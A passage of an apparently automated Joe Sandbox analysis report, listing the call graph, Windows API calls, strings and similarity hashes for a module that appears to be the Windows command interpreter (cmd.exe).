21215 178e4 451 API calls 21210->21215 21220 34191 451 API calls 21210->21220 21223 1c8b3 _get_osfhandle SetFilePointer 21210->21223 21226 1c799 21210->21226 21227 1c8da _get_osfhandle GetFileType 21210->21227 21229 1caa2 21210->21229 21230 2d162 memcmp 21210->21230 21240 1c808 MultiByteToWideChar 21210->21240 21241 26c78 4 API calls 21210->21241 21243 1c7b8 SetFilePointer 21210->21243 21244 2d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21210->21244 21245 1c86f wcschr 21210->21245 21246 1ca03 iswspace 21210->21246 21247 1ca1e wcschr 21210->21247 21248 1caeb wcschr 21210->21248 21249 1ca49 wcschr 21210->21249 21250 2d2b3 _get_osfhandle SetFilePointer 21210->21250 21251 1cb10 iswspace 21210->21251 21252 1cb25 wcschr 21210->21252 21253 2d322 _get_osfhandle SetFilePointer 21210->21253 21254 2d302 WideCharToMultiByte 21210->21254 21255 1cb50 iswspace 21210->21255 21256 1cb80 wcschr 21210->21256 21258 1cbc9 _wcsicmp 21210->21258 21259 1cb65 wcschr 21210->21259 21260 2d3d3 WideCharToMultiByte 21210->21260 21211->21210 21214->21210 21215->21210 21216 1e272 456 API calls 21220->21210 21223->21210 21223->21227 21231 1a16c _close 21226->21231 21227->21210 21228 1c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21227->21228 21228->21210 21232 2d3fc 21229->21232 21235 1cabd _get_osfhandle SetFilePointer 21229->21235 21230->21210 21233 1ca81 21231->21233 21234 21cb1 453 API calls 21232->21234 21236 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21233->21236 21237 2d409 21234->21237 21235->20952 21238 1ca90 21236->21238 21239 178e4 451 API calls 21237->21239 21238->20952 21242 2d427 21239->21242 21240->21210 21241->21210 21243->21210 21244->21210 21245->21210 21246->21210 21246->21247 21247->21210 21248->21210 21248->21250 21249->21210 21250->21210 21250->21251 21251->21210 21251->21252 21252->21210 21253->21210 21254->21253 21255->21210 21255->21259 21257 1cb96 wcschr 21256->21257 21256->21258 21257->21210 
21257->21258 21258->21210 21259->21210 21260->21210 21675 19e09 21261->21675 21264 19de1 21266 19df7 21264->21266 21268 19950 451 API calls 21264->21268 21265 2c2b9 21267 163bd 451 API calls 21265->21267 21266->20952 21269 2c2d1 21267->21269 21268->21266 21269->21266 21689 39fcf _get_osfhandle GetFileType 21269->21689 21271 2c2e5 21272 1dd98 6 API calls 21271->21272 21273 2c2e9 21271->21273 21272->21273 21273->21266 21274 178e4 451 API calls 21273->21274 21275 2c316 21274->21275 21275->21275 21690 226dc memset 21276->21690 21280 19cd3 21279->21280 21307 19780 21279->21307 21281 1dcd0 451 API calls 21280->21281 21282 19cdd 21281->21282 21283 1a62f wcschr 21282->21283 21282->21307 21307->20952 21487 2ca49 21486->21487 21490 1aa90 21486->21490 21488 1bc30 451 API calls 21487->21488 21507 2ca70 21487->21507 21580 35166 21487->21580 21488->21487 21490->21487 21491 1aacb _wcsnicmp 21490->21491 21492 1ab3d 21491->21492 21493 1aadf _wcsnicmp 21491->21493 21511 23326 21492->21511 21495 2c9fd 21493->21495 21504 1aaf7 21493->21504 21543 353aa 21495->21543 21498 2cad1 21500 178e4 451 API calls 21498->21500 21499 1ab0f 21499->21498 21502 1ab1b wcschr 21499->21502 21503 2cb08 21500->21503 21501 2ca2d wcsrchr 21501->21499 21504->21498 21504->21499 21504->21501 21507->21498 21510 20060 5 API calls 21507->21510 21510->21498 21512 233ab 21511->21512 21513 2333b 21511->21513 21514 178e4 451 API calls 21512->21514 21513->21512 21515 20060 5 API calls 21513->21515 21516 2f76c 21514->21516 21517 23349 21515->21517 21544 1acb0 451 API calls 21543->21544 21581 3516f 21580->21581 21585 35190 21580->21585 21665 2727b __iob_func 21581->21665 21583 35180 fprintf 21583->21487 21584 351dd 21584->21487 21585->21584 21586 19950 451 API calls 21585->21586 21586->21585 21665->21583 21667 1ab7f 2 API calls 21666->21667 21668 1b3d3 21667->21668 21669 1ab7f 2 API calls 21668->21669 21673 1b3eb 21668->21673 21669->21673 21670 1b3f6 wcschr 21671 1b408 wcschr 21670->21671 21672 1b440 21670->21672 
21671->21672 21671->21673 21672->21216 21673->21670 21673->21671 21673->21672 21674 1a62f wcschr 21673->21674 21674->21673 21676 19e14 21675->21676 21687 19dd5 21675->21687 21677 19e8e iswspace 21676->21677 21678 19e19 21677->21678 21679 19e27 iswspace 21678->21679 21680 19e40 21678->21680 21678->21687 21679->21678 21679->21680 21681 19e8e iswspace 21680->21681 21682 19e47 21681->21682 21683 19e62 21682->21683 21684 2c31b _wcsnicmp 21682->21684 21682->21687 21685 19e71 _wcsnicmp 21683->21685 21686 19e67 21683->21686 21684->21686 21684->21687 21685->21686 21685->21687 21686->21687 21688 178e4 451 API calls 21686->21688 21687->21264 21687->21265 21688->21687 21689->21271 21691 1e3f0 17 API calls 21690->21691 21692 227be 21691->21692 21693 228f8 21692->21693 21694 227c8 memset GetEnvironmentVariableW 21692->21694 21695 22912 21693->21695 21696 2290a ??_V@YAXPAX 21693->21696 21697 1e3f0 17 API calls 21694->21697 21698 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21695->21698 21696->21695 21699 22830 21697->21699 21700 22925 21698->21700 21701 228e2 21699->21701 21703 2284a GetEnvironmentVariableW 21699->21703 21700->20916 21701->21693 21702 2f431 ??_V@YAXPAX 21701->21702 21702->21693 21704 2f3b2 21703->21704 21705 22865 21703->21705 21707 19144 451 API calls 21704->21707 21721 19144 21705->21721 21708 2f3cd 21707->21708 21708->21705 21710 178e4 451 API calls 21708->21710 21709 22872 21709->21701 21711 18e9e 451 API calls 21709->21711 21713 2f3e7 21709->21713 21710->21705 21722 1bc30 449 API calls 21721->21722 21723 19172 21722->21723 21724 2b904 21723->21724 21725 1926f 21723->21725 21726 191a6 towupper 21723->21726 21727 2bb35 21723->21727 21729 20060 5 API calls 21723->21729 21733 2bad3 21723->21733 21734 2054b 449 API calls 21723->21734 21737 2669f 449 API calls 21723->21737 21739 2ba93 21723->21739 21741 192c2 21723->21741 21745 3a37a 449 API calls 21723->21745 21724->21709 21724->21724 21728 26b30 
__ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21725->21728 21726->21723 21731 1dcd0 449 API calls 21727->21731 21729->21723 21736 163bd 449 API calls 21733->21736 21734->21723 21736->21725 21737->21723 21742 3a53d 449 API calls 21739->21742 21746 178e4 449 API calls 21741->21746 21742->21733 21745->21723 22059 1e7a2 22058->22059 22060 1e7c6 22058->22060 22061 1e7ab wcschr 22059->22061 22064 1e697 22059->22064 22063 1dc60 2 API calls 22060->22063 22060->22064 22062 1e7f4 22061->22062 22061->22064 22065 1dcd0 451 API calls 22062->22065 22063->22064 22064->20958 22064->20964 22071 1e7fe 22065->22071 22066 1e83f 22066->22064 22068 1dc60 2 API calls 22066->22068 22067 1bf70 459 API calls 22067->22071 22068->22064 22069 1dd20 451 API calls 22069->22066 22070 1e8f7 22070->22064 22070->22066 22070->22069 22071->22064 22071->22066 22071->22067 22071->22070 22073 21606 lstrcmpW 22072->22073 22074 21615 lstrcmpiW 22072->22074 22075 2160c 22073->22075 22074->22075 22075->20981 22077 22998 22076->22077 22078 22a09 lstrcmpiW 22077->22078 22079 229ff lstrcmpW 22077->22079 22080 229a0 22077->22080 22078->22080 22079->22080 22080->20981 22082 1a1bd 22081->22082 22082->21020 22083->21020 22085 2054b 451 API calls 22084->22085 22091 20c22 22085->22091 22086 20d9e 22087 1bc30 451 API calls 22086->22087 22142 20e27 22086->22142 22087->22142 22088 210ae 22088->21078 22089 21436 CreateFileW 22092 2ed11 22089->22092 22093 21457 SetFilePointer SetFilePointer 22089->22093 22090 1dd20 451 API calls 22094 20d6a 22090->22094 22091->22086 22095 20c93 _wcsnicmp 22091->22095 22122 1dc60 2 API calls 22091->22122 22133 2054b 451 API calls 22091->22133 22135 2129a wcstol 22091->22135 22136 2118f wcstol 22091->22136 22138 20d4a 22091->22138 22091->22142 22099 178e4 451 API calls 22092->22099 22097 1dcd0 451 API calls 22093->22097 22098 1dd20 451 API calls 22094->22098 22100 20cac _wcsnicmp 22095->22100 22095->22142 22096 398b5 456 API calls 22096->22142 22097->22142 22101 
20d81 22098->22101 22102 2ed1e GetLastError 22099->22102 22103 20cc7 _wcsnicmp 22100->22103 22104 2ebf5 22100->22104 22101->22086 22107 2ec27 22101->22107 22102->22088 22108 20ce2 _wcsnicmp 22103->22108 22103->22142 22113 178e4 451 API calls 22104->22113 22105 2ed00 CloseHandle 22105->22088 22106 2148a ReadFile CloseHandle 22106->22142 22109 178e4 451 API calls 22107->22109 22108->22091 22111 21131 _wcsnicmp 22108->22111 22114 2ec33 22109->22114 22110 1dd20 451 API calls 22110->22142 22117 21563 wcstol 22111->22117 22118 2114c _wcsnicmp 22111->22118 22112 212d3 _wpopen 22119 2ece5 22112->22119 22120 212ff feof 22112->22120 22113->22088 22121 39922 451 API calls 22114->22121 22115 2198f 3 API calls 22115->22142 22116 1dc60 GetProcessHeap RtlFreeHeap 22116->22142 22117->22104 22117->22142 22118->22091 22118->22104 22126 178e4 451 API calls 22119->22126 22124 21313 ferror 22120->22124 22125 2136e _pclose 22120->22125 22129 2ec3b longjmp 22121->22129 22122->22091 22123 21546 22130 1dc60 2 API calls 22123->22130 22124->22125 22124->22142 22132 1dd20 451 API calls 22125->22132 22131 2ecf2 GetLastError 22126->22131 22127 2ecb3 _pclose 22127->22088 22128 2134d fgets 22128->22125 22128->22142 22129->22088 22130->22127 22131->22088 22132->22142 22133->22091 22134 213db MultiByteToWideChar 22134->22142 22135->22104 22135->22142 22136->22091 22136->22104 22137 214e7 feof 22137->22124 22137->22142 22138->22086 22138->22090 22139 1dcd0 451 API calls 22139->22142 22140 20fc8 wcschr 22140->22142 22141 2ecc9 22145 178e4 451 API calls 22141->22145 22142->22088 22142->22089 22142->22096 22142->22105 22142->22106 22142->22110 22142->22112 22142->22115 22142->22116 22142->22117 22142->22123 22142->22125 22142->22127 22142->22128 22142->22134 22142->22135 22142->22137 22142->22139 22142->22140 22142->22141 22143 20f0a wcschr 22142->22143 22144 20bbb 488 API calls 22142->22144 22146 213b7 memmove 22142->22146 22147 20f90 wcschr 22142->22147 22143->22142 22144->22142 22145->22088 
22146->22142 22147->22142 22149 16f39 22148->22149 22160 16ea7 22148->22160 22150 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22149->22150 22151 16f4e 22150->22151 22151->21078 22152 2a746 22153 398b5 456 API calls 22152->22153 22191 1701a 22153->22191 22154 1a62f wcschr 22154->22160 22155 16f5d 22156 20060 5 API calls 22155->22156 22157 16f64 22156->22157 22159 1acb0 451 API calls 22157->22159 22158 1dcd0 451 API calls 22158->22191 22161 16f6b 22159->22161 22160->22149 22160->22152 22160->22154 22160->22155 22162 20bbb 488 API calls 22160->22162 22165 2198f 3 API calls 22160->22165 22163 2589a 10 API calls 22161->22163 22162->22160 22164 16fa6 22163->22164 22168 18f21 451 API calls 22164->22168 22164->22191 22165->22160 22166 398b5 456 API calls 22166->22191 22167 25851 2 API calls 22167->22191 22177 16fbf 22168->22177 22169 1dc60 2 API calls 22169->22191 22170 2a7fa 22175 1dc60 2 API calls 22170->22175 22171 2198f 3 API calls 22171->22191 22172 18b4d 2 API calls 22172->22191 22173 2a806 22176 39922 451 API calls 22173->22176 22174 1725d 22180 17271 22174->22180 22181 2a851 22174->22181 22175->22173 22178 2a80b longjmp 22176->22178 22177->22173 22182 1dcd0 451 API calls 22177->22182 22177->22191 22179 2a819 22178->22179 22233 221d2 22179->22233 22183 18bc7 451 API calls 22180->22183 22184 39a7d 451 API calls 22181->22184 22182->22191 22186 1727b GetProcessHeap RtlFreeHeap 22183->22186 22187 2a85c 22184->22187 22190 172ee 8 API calls 22186->22190 22188 1dd20 451 API calls 22188->22191 22189 2a824 22194 21e70 451 API calls 22189->22194 22196 2a835 exit 22189->22196 22193 17294 22190->22193 22191->22158 22191->22166 22191->22167 22191->22169 22191->22170 22191->22171 22191->22172 22191->22173 22191->22174 22191->22188 22192 20bbb 488 API calls 22191->22192 22192->22191 22232 172c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22193->22232 22194->22189 22196->22174 22197 1729c GetProcessHeap RtlFreeHeap 22198 172bc 22197->22198 

Control-flow Graph

Legend: Executed / Not Executed

APIs
• FindFirstFileExW.KERNELBASE(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025944
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002594B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002596C
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025973
• FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002598F
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000259B6
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0003160B
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00031618

Memory Dump Source
• Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000_alpha.jbxd

Similarity
• API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
• String ID:
• API String ID: 3609286125-0
• Opcode ID: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
• Instruction ID: 610b8a82cdd21b61b607836d946b13127c5928affbf299328792a5b3160a90a8
• Opcode Fuzzy Hash: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
• Instruction Fuzzy Hash: 0F31A075205700EFEB148F64ED09A6E3BF5EB46337F204619E592932E0E73998419B1A

Control-flow Graph

Legend: Executed / Not Executed

APIs
• InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
• UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
• memset.MSVCRT ref: 000194F1
• memset.MSVCRT ref: 0001954A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNELBASE(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00019602
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00019624
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BE0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0002BE26
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7af1518590ddbed6b93c907c256e2b5bda059e16e6681f4c1b98b90417f92333
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6b1406babd7ab950e4b249626a42d9306312264f0a30951a59db6ae39ffe48d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af1518590ddbed6b93c907c256e2b5bda059e16e6681f4c1b98b90417f92333
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1A174A043259FEB649B64DC55BEE77B8EF46304F0040AAE60AD7181EB748DC0CF62
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpmemsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$\$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1630141434-1113867418
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f6032b907a0f6950f34f90d611b1dafcfeeb019fbb61539c51006a342bc54fdb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 442a044d4e8222f06b033c3ec69fd9e6d40cd13af0c747d65ad9be263ea256f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6032b907a0f6950f34f90d611b1dafcfeeb019fbb61539c51006a342bc54fdb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7642AF746083528BD774EF14D8957FFB2E2AF84304F584538E84A8B291EB78DD85C792

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002011A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00020156
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC77
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECB9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECCF
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECE5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECF7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ED0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 000201DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.MSVCRT ref: 0002E621
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0002E683
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002E71A
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 268959451-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _callnewh.MSVCRT ref: 00027437
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000274D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000277EC,00000001), ref: 000274E7
                                                                                                                                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00027444
                                                                                                                                                                                                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT(?,0003CBF8), ref: 000277F5
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 813871643-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001F410: _wcsnicmp.MSVCRT ref: 0001F483
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001F410: memset.MSVCRT ref: 0001F4BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,00000104,00007FE7), ref: 000220E5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: memset.MSVCRT ref: 000194F1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: memset.MSVCRT ref: 0001954A
